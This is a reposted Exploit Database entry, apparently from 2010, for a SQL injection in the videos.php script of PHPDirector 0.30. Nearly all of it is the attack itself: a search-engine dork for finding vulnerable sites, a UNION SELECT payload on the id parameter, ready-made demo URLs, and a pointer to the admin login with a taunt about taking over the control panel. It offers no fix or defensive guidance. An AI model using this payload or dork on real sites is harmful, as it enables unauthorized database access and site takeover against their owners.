PHPDirector 0.30 – ‘videos.php’ SQL Injection

• Exploit Database
• 9 阅读

• 作者： Mr-AbdoX
  日期： 2010-06-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14106/

• ======================================================================
  PHPDirector 0.30 (videos.php) SQL Injection Vulnerability #
  ======================================================================
  # Date : 29/06/2010 #
  # Author : Mr-AbdoX #
  # Emails : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com #
  # My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/ #
  # Script home : www.phpdirector.co.uk/ #
  # Tested on : Linux & Windows #
  =================Exploit============================================
  
  Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]
  
  [~] ExploiT [~]
  
  http://www.site.com/videos.php?id=[SQL]
  
  union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
  
  
  [~] ConTroL Panel (admin login) [~]
  
  http://www.site.com/login.php
  
  
  [~] demo [~]
  
  
  http://server/path/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
  
  http://server/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
  
  enjoy in control panel Like U WanT :p
  
  
  Don't Forget greetz Me...
  
  Peace
  
  
  [~] GreetZ To [~]
  
  The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz